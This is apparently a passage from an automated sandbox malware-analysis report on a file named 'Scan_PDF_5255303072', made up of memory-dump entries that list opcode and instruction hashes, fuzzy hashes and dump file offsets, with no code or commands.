                                                                        • Opcode ID: dfc0cf8faf4d90010847743e8238dce127f65565228b6e03fbb4cf9b0f2aa01c
                                                                        • Instruction ID: d5ba59b0252843c821f4de37870b513194518096214abbcee96c65a8f6c85ef3
                                                                        • Opcode Fuzzy Hash: dfc0cf8faf4d90010847743e8238dce127f65565228b6e03fbb4cf9b0f2aa01c
                                                                        • Instruction Fuzzy Hash: 83118E713007059BE700EF69E8C59AEB7A6FB842507808929E9168B750EF74BC01CBE8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1398699650.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b00000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: S/jm^
                                                                        • API String ID: 0-3516529370
                                                                        • Opcode ID: d7051294153226c8c3d2d960e90946ba599c44aecd2fa3054e6868b32e21d4e0
                                                                        • Instruction ID: cf5efbc2c8e72632942aa5cfbb7206640bdfd21578de6c851299739361386ec6
                                                                        • Opcode Fuzzy Hash: d7051294153226c8c3d2d960e90946ba599c44aecd2fa3054e6868b32e21d4e0
                                                                        • Instruction Fuzzy Hash: 4E1142713007059BD704EF65E8C48AEB7A6FBC52507808939E5158B750EF74BD05CBE9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383807539.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1920000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: U
                                                                        • API String ID: 0-3372436214
                                                                        • Opcode ID: a0e4d463c19079510f3e447dcdfc0a6f77cb04fdad4161168695407b6f796f2a
                                                                        • Instruction ID: 92d1591aff10f04a6fc47bf1bd5bc2d44522142f115b0f7cc6767853875c506f
                                                                        • Opcode Fuzzy Hash: a0e4d463c19079510f3e447dcdfc0a6f77cb04fdad4161168695407b6f796f2a
                                                                        • Instruction Fuzzy Hash: F5E0DF71A08388AFCB42CF78FC0814DBBB1EB46201B0044DAC80CCF252DA311E04CB91
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1398699650.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b00000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9437d6e0b3e0f3aec973825e81a3ce40fc5697321e86aa7a224d4581f2d46b21
                                                                        • Instruction ID: a21331e30cc4f2760ac0eed5baa6d9fbb960607b9197dfead166bba001954cef
                                                                        • Opcode Fuzzy Hash: 9437d6e0b3e0f3aec973825e81a3ce40fc5697321e86aa7a224d4581f2d46b21
                                                                        • Instruction Fuzzy Hash: 21E15D35A00615CFCB14DF68C8849AABBF2FF88300B558599E8499B3A5EB30FD45CF94
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1398699650.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b00000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b85b3e60bd2425dde94e17639e25803fd642d1f200a2a438d46831f59ef6f76a
                                                                        • Instruction ID: 1f07cf297b09835fa2f8593de378a03a3125150c001a4af441e4a2e78e132fe9
                                                                        • Opcode Fuzzy Hash: b85b3e60bd2425dde94e17639e25803fd642d1f200a2a438d46831f59ef6f76a
                                                                        • Instruction Fuzzy Hash: EFC16031B002199FDB14DFA9C984AAEBBF6FF88310F158069D815A7391DB34ED41CBA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1398699650.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b00000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ccc43d42a44b043353cc2667d9dd911bc330bd6ea2ea55bb6ad2171075af462b
                                                                        • Instruction ID: 3277aea2bc05e82c017eeb0f70f61413d7345ab7fad628fc3b8322a108c36b3f
                                                                        • Opcode Fuzzy Hash: ccc43d42a44b043353cc2667d9dd911bc330bd6ea2ea55bb6ad2171075af462b
                                                                        • Instruction Fuzzy Hash: 7AB14435B006048BDB64EB64D898AAEBBF3EBC8210F549469D406AB794DF34BC41CF95
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383807539.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1920000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 20f835a4ee1549ffe3bdc3423f0bb6c8136f9265995bfb25b22824e2456f52a7
                                                                        • Instruction ID: 9d4480cf0ee50dc95002519017c257d127943677982a2e7bd80d5a4a5f3aa0d5
                                                                        • Opcode Fuzzy Hash: 20f835a4ee1549ffe3bdc3423f0bb6c8136f9265995bfb25b22824e2456f52a7
                                                                        • Instruction Fuzzy Hash: 8DC10635A0121ADFCF01CF98D8809AEBBF6FF49320B248459E959A7315D731E916CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1398499046.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ae0000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 88291b48793fd879efbf8fea5cc9f0668fbcf194ad23e9d740415a47f852ec53
                                                                        • Instruction ID: 1ed14bc619aa5efd22e4c00fb3801417cebd8eaa419c748ddc159449b5722072
                                                                        • Opcode Fuzzy Hash: 88291b48793fd879efbf8fea5cc9f0668fbcf194ad23e9d740415a47f852ec53
                                                                        • Instruction Fuzzy Hash: B6C1C178A002049FDB14DF69C894EAAB7F2FF88310F65C559E915AB3A1DB35EC41CB60
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1398699650.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b00000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8c48b3e38399d90daadb327d436527417456aebce9421a97f428fb69e28cbcaf
                                                                        • Instruction ID: 41b1e8b8698cdaa06f7e328608b119d05648ec9fd11e602090fbc6da0b5ff021
                                                                        • Opcode Fuzzy Hash: 8c48b3e38399d90daadb327d436527417456aebce9421a97f428fb69e28cbcaf
                                                                        • Instruction Fuzzy Hash: 1CC16F34601615CFC704DF58C988DBABBF2FF84304B968999E4469B2A6DB34FC45CBA4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1398499046.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ae0000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0c04c4cad7c3512318be5927e051cca3c06830839abc7de0cf25cb750c467888
                                                                        • Instruction ID: 9d22c2d9c11b55751db9619042a333f65acced748ed3a9882d4ad82aff1e2522
                                                                        • Opcode Fuzzy Hash: 0c04c4cad7c3512318be5927e051cca3c06830839abc7de0cf25cb750c467888
                                                                        • Instruction Fuzzy Hash: 3BA17C34B002059FDB14EB68C894A6EBBB3FB88310F548969D516DB385DF35EC42CBA5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1398499046.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ae0000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 42999755b5fddbfff0436a48b1f857e3363078b5bd22251fac270c3184f10909
                                                                        • Instruction ID: 30c63e38caa569c0553556419bfc84f7e7a8ff28242fac4d59dc8d2c1d74905c
                                                                        • Opcode Fuzzy Hash: 42999755b5fddbfff0436a48b1f857e3363078b5bd22251fac270c3184f10909
                                                                        • Instruction Fuzzy Hash: 55A1E734B006158FDB14DBA8C494EAEBBF2BF89300B5485A8E416AB364DB75EC41CF94
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1398499046.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ae0000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 94bb224b273142ebf1b3e8acf8981bc83f5d5283400e73435ae69601921a960d
                                                                        • Instruction ID: 866bc7af214a39840fe1e30db060673a25b77c6f5b0c11506a94efaa8ee1c13c
                                                                        • Opcode Fuzzy Hash: 94bb224b273142ebf1b3e8acf8981bc83f5d5283400e73435ae69601921a960d
                                                                        • Instruction Fuzzy Hash: 3C91F734B006158FDB14DBA8C494EAEBBF2FF89300B5485A8E416AB364DB35EC41CF54
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383807539.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1920000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2e139cf321acd7cabf029ba5aadf3aec9466399cb89fccbfc44f16f2c452d691
                                                                        • Instruction ID: 4d179378c1b4063915b73e3e8a9c6200f98d1ac518338c5dd5b1ce960cad46ef
                                                                        • Opcode Fuzzy Hash: 2e139cf321acd7cabf029ba5aadf3aec9466399cb89fccbfc44f16f2c452d691
                                                                        • Instruction Fuzzy Hash: 06919A35A007508FDB02DB68C89896ABBF5FF8E31075485A9D45ADB775DB30EC01CB91
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1398499046.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ae0000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 76d5b03474265f22ad3864447a86dfaf54dee602e188e065954f47b55a733871
                                                                        • Instruction ID: 176c4f81b098ef3af30ba6cb3051c14cfa4f724bf548e05b1b114eb1a1c7b5a3
                                                                        • Opcode Fuzzy Hash: 76d5b03474265f22ad3864447a86dfaf54dee602e188e065954f47b55a733871
                                                                        • Instruction Fuzzy Hash: 04918875A006159FD724DF68C884A6AFBF2FF88301F58C969E5569B641C731FC42CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383807539.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1920000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: beb3a8c77f214c60ca85cdca4b638331ccc2b6ab8e3f9654d58cc1848ad6decd
                                                                        • Instruction ID: 04d49160a30474d1d36d915e21395667f4b5eb5952f959cdb449c4a5f6172726
                                                                        • Opcode Fuzzy Hash: beb3a8c77f214c60ca85cdca4b638331ccc2b6ab8e3f9654d58cc1848ad6decd
                                                                        • Instruction Fuzzy Hash: 7A916C30B007158BEB15DF69D88499EBBF6EF88310B148629D819AB359DB74EC06CFC4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1398499046.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ae0000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a99c01493383f01c85b624246598df3b6b0cd420b9cd0c15929fa85337ff6992
                                                                        • Instruction ID: 0b6a533259776dc81de246c7d5f1526074b20a975b7590f43474e5d4a5ae4e7b
                                                                        • Opcode Fuzzy Hash: a99c01493383f01c85b624246598df3b6b0cd420b9cd0c15929fa85337ff6992
                                                                        • Instruction Fuzzy Hash: EA61F731B006159FCB259B68D890A6EF7B7FFC8720B24846AD456E7341DF319842CBA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383807539.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1920000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b7dc8d476c13754e20ecb11dce539a4aa523ad177590263e737f4ccb7fd2ce63
                                                                        • Instruction ID: 4036ce7f055a5a81d9efca0d96abe448dc42dc0d0d8d7e08744f3f23f79f1c8b
                                                                        • Opcode Fuzzy Hash: b7dc8d476c13754e20ecb11dce539a4aa523ad177590263e737f4ccb7fd2ce63
                                                                        • Instruction Fuzzy Hash: A0813B74B002059FDB15DF69D898A6EBBF6FB88300B108529E81ADB355DB74EC02CF94
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383807539.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1920000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 91173ba35f371d5ae089e2677da7e44f29b2c1f706eb9505e96274f3ecb591fc
                                                                        • Instruction ID: 6201320760147a047c6ec36c4b25f1601324b55d0cf6f560d416d3e1bf3ff0c2
                                                                        • Opcode Fuzzy Hash: 91173ba35f371d5ae089e2677da7e44f29b2c1f706eb9505e96274f3ecb591fc
                                                                        • Instruction Fuzzy Hash: D8812C34B002159FDB15DF69D898A6EBBF6FB88300B108529E91ADB355DB74EC02CF94
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1398499046.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ae0000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 77ec96e67ad6d790234abe6cdc93aff841975a547cdf0b14593a1cbd43dbc155
                                                                        • Instruction ID: f48ebc7f8ae3342e4394ab9657118b113be037840ea6442ffe1d950e5d7e1cc9
                                                                        • Opcode Fuzzy Hash: 77ec96e67ad6d790234abe6cdc93aff841975a547cdf0b14593a1cbd43dbc155
                                                                        • Instruction Fuzzy Hash: F8818C75A006058FC700DB68D889E6EBBF2FF89311F5585A9E919DB361DB31EC01CBA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1398699650.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b00000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f2b437e746f3722c6cc43ecc1c93c8cb5a342856c5aa70dfe835bc15b88809fa
                                                                        • Instruction ID: ffda0c0eef85c4b99c0123b420a1e982f739fa1e378d0f545002d5d49ad51e5c
                                                                        • Opcode Fuzzy Hash: f2b437e746f3722c6cc43ecc1c93c8cb5a342856c5aa70dfe835bc15b88809fa
                                                                        • Instruction Fuzzy Hash: FB814D74A002099FDB44DF68C884AAEBBB6FF85310F558199E909AB391DB71ED41CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1398499046.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ae0000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3ffed0c03a9021c8b49107a5f44deddaae48c1465ff36b5c9da99ff716b7e8a9
                                                                        • Instruction ID: 6ef004100ed7934eec56d752d62bdf96cab68f8fcf663fb34ddff90226fd0fbd
                                                                        • Opcode Fuzzy Hash: 3ffed0c03a9021c8b49107a5f44deddaae48c1465ff36b5c9da99ff716b7e8a9
                                                                        • Instruction Fuzzy Hash: 9C718231B002199FDB14DF69C894EAEB7F2FF88310F548169E915A7350DB319C52CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1398499046.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ae0000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: db5f9ab8cfcee7d6d434ffdc36e2f401330e13d19de89a554d439cb93575c6e5
                                                                        • Instruction ID: 8c787f1822743d5c943007880e6b90bcbfcaf0a1f920fa43b0e2d9c415c18e35
                                                                        • Opcode Fuzzy Hash: db5f9ab8cfcee7d6d434ffdc36e2f401330e13d19de89a554d439cb93575c6e5
                                                                        • Instruction Fuzzy Hash: FA813775600704EFDB24DF68C980E6EBBB2FF84300B458968E846AB656D771F941CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1398499046.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ae0000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 54c90bfd8347d5fb8ca893d20aa16c727da182ad6954a41bb81131103eb173c1
                                                                        • Instruction ID: ae51ccc0181afd51d3d30468e3878201a8f4a3aaf570ce1c1e8aa1764266538e
                                                                        • Opcode Fuzzy Hash: 54c90bfd8347d5fb8ca893d20aa16c727da182ad6954a41bb81131103eb173c1
                                                                        • Instruction Fuzzy Hash: 2E71DE30A007159FDB44EF68D894A9DBBB2FF88310F548569E505EB3A0DF30AD05CB99
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383807539.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1920000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 36c270261de5c70d3d7222b0a082d92a834816e3914cab91115aaaba328dd9bf
                                                                        • Instruction ID: b2149224a894a360190d17945181e55e3ae3e5c760eb8b8ff45eb40dd72c2769
                                                                        • Opcode Fuzzy Hash: 36c270261de5c70d3d7222b0a082d92a834816e3914cab91115aaaba328dd9bf
                                                                        • Instruction Fuzzy Hash: 95619031B006158FDB04DF68D8805AEBBF6FFC9210714896DE50AEB391DB75EC068BA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383807539.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1920000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 342691414a43ebc3008daf6e253694f891bec32af082a62095c094783c46dd64
                                                                        • Instruction ID: aa7dd840a532b437b2197d95b369ad63dcf8e915369588c47bc848d74fea38f3
                                                                        • Opcode Fuzzy Hash: 342691414a43ebc3008daf6e253694f891bec32af082a62095c094783c46dd64
                                                                        • Instruction Fuzzy Hash: 00610738B106159FDB14DF69D894AAEB7F6FF8D205B108168E50AAB365DB30EC01CF81
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1398499046.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ae0000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a412bd6d0cf304fa27f2c754c4fc869195ebb9a9183357f6ca0ff4bcbb4bcaf6
                                                                        • Instruction ID: 0d5744a899f56892d938aaa52da80fae180d9487b5e615d9df289fc83f154669
                                                                        • Opcode Fuzzy Hash: a412bd6d0cf304fa27f2c754c4fc869195ebb9a9183357f6ca0ff4bcbb4bcaf6
                                                                        • Instruction Fuzzy Hash: 165112327006155FD714EF68C884E6EBBA7FFC5320B598469D9199B391DB31EC02CBA4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1398499046.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ae0000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e290f68f576310412a0d17230116ab1ec34fc15eb837dc462a4faf261b63624c
                                                                        • Instruction ID: c91a43c337ec138475b5eb5430d9a43f8a0a9023f8bba2e6b0438824fc56d7b5
                                                                        • Opcode Fuzzy Hash: e290f68f576310412a0d17230116ab1ec34fc15eb837dc462a4faf261b63624c
                                                                        • Instruction Fuzzy Hash: 9C51B030B002159FDB249B65D858B6EBBF2BF84711F14896EE427DB291DB31AC45CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383807539.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1920000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 77fcb11f864426093fc81edacc1c45037d6167addd300f628c4efa9ddd0a2a59
                                                                        • Instruction ID: 63b2a5aa1734ef6d9b566c1a38a100ebf567ae35ca854ccf923b32757ec56dfb
                                                                        • Opcode Fuzzy Hash: 77fcb11f864426093fc81edacc1c45037d6167addd300f628c4efa9ddd0a2a59
                                                                        • Instruction Fuzzy Hash: A751F434B002158FDF14DFA9D894BAEBBE6EFC8211B148469E909DB385CB34DD01CBA5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383807539.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1920000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3e88b4663b250b83c98b3955ee8c621c5cc40dc18d8b99a23d65a06ed41245f8
                                                                        • Instruction ID: 784db1171dc7af8c3fb0aac9973e6b5bbf1989739c839745c06ae1988d67d484
                                                                        • Opcode Fuzzy Hash: 3e88b4663b250b83c98b3955ee8c621c5cc40dc18d8b99a23d65a06ed41245f8
                                                                        • Instruction Fuzzy Hash: 62513D35A10619CFDB04CFA9C88499DB7F6FF8A700B25816AE505EF361DB71AD05CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383807539.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1920000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 50e58891997d9a45896f66937efa43cc111bbee308f08ef45ed883897f747318
                                                                        • Instruction ID: 2e5f222d9f61ef6b6d3e289b8b6d6c0b4d5c2ffffd0ef86a70cba03c99054c30
                                                                        • Opcode Fuzzy Hash: 50e58891997d9a45896f66937efa43cc111bbee308f08ef45ed883897f747318
                                                                        • Instruction Fuzzy Hash: B961DE34A10A048FCB54EF69C88885ABBF2FF8D61075585A9E51ADB771DB30EC05CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383807539.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1920000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5b1f53b82b017ab9677de3e7a047f19ee5edc4b60d39f491d7a82c93d12c39ac
                                                                        • Instruction ID: 2c659d7373667182d297fc6e6d34445c034dcf7b564706a724446fc77bc5fcce
                                                                        • Opcode Fuzzy Hash: 5b1f53b82b017ab9677de3e7a047f19ee5edc4b60d39f491d7a82c93d12c39ac
                                                                        • Instruction Fuzzy Hash: C0519F70E003599FEB01DFB8E844BDDBBB1FF89300F518269E414AB251DB79A845CB95
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1398499046.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ae0000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1de6622a50b4a81b4531d7c881a14a41a0837e39668069c9c2cb06596c0e6cb7
                                                                        • Instruction ID: a27c928dcad0a213745e0b446fe461905329890170d077499658d71e5665875e
                                                                        • Opcode Fuzzy Hash: 1de6622a50b4a81b4531d7c881a14a41a0837e39668069c9c2cb06596c0e6cb7
                                                                        • Instruction Fuzzy Hash: 4B515D34A002099FCB10DF68D8C9D6EBBB2FB84311F55C4A9E5499B356DB31EC02CBA5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383807539.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1920000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1029085170b5833e29daf9e6e4860b0ec5006c8043bba12c389e6f3376ed279e
                                                                        • Instruction ID: c6584cc101a1cda5fa131cad1e0b1c2f716cde6a8640c0d797e77152d10413b9
                                                                        • Opcode Fuzzy Hash: 1029085170b5833e29daf9e6e4860b0ec5006c8043bba12c389e6f3376ed279e
                                                                        • Instruction Fuzzy Hash: 8D516D70E003159FEB04DFA8E888BDDB7B2FF88310F108669E414AB295DB759945CF94
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1398499046.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ae0000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7c46c3f3464d012bb3eb68f3ddc6f0870b030496061ddf4ff77bf95d3746cde7
                                                                        • Instruction ID: 0cc6f6f0ad9f58e29443a74f08929037649e408fc40b3cab5b2d22964c6eda6b
                                                                        • Opcode Fuzzy Hash: 7c46c3f3464d012bb3eb68f3ddc6f0870b030496061ddf4ff77bf95d3746cde7
                                                                        • Instruction Fuzzy Hash: F0519F75B002015FDB15AB68CC98B7EBBF2EF88710F184059E906DB395DA35EC02CB95
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1398499046.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ae0000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
